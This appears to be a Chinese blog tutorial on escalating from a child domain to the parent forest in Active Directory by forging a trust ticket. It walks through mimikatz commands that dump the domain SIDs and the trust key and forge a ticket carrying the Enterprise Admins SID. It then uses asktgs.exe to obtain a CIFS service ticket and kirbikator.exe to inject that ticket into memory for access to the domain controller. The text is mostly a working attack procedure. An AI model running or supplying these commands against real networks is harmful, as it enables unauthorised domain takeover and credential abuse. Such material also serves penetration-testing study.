域内攻击方法

环境:

在这里插入图片描述

攻击方法:伪造信任票据

部分工具下载地址:https://github.com/myxss/asktgs_compiled

一、获取子域和父域的SID 以及域信任密钥

mimikaze中有此功能
在mimikaze输入:lsadump::trust /patch

在这里插入图片描述
指向分别为 域林和子域的SID以及双方的信任密钥

二、通过SID以及信任密钥伪造信任密钥

在mimikatz中输入:
"kerberos::golden /domain:[当前所在域] /sid:[当前域的SID] /sids:[当前域的sid-519] /rc4:[信任密钥 /user:[将权限赋予谁] /service:[需要访问的服务] /target:[目标] /ticket:[生成的文件名] " exit

在这里插入图片描述

三、利用信任票据获得目标服务的TGS

在这里插入图片描述
输入命令:asktgs.exe [生成的信任票据kirbi] CIFS/[目标域主机名].[域名称]
在这里插入图片描述

四、将TGS票据注入到内存

将TGS票据注入到内存,使得主机有访问域林的权限
kirbikator.exe lsa CIFS.[目标域的主机名].[目标域名].kirbi
在这里插入图片描述
此时即可访问域控
在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值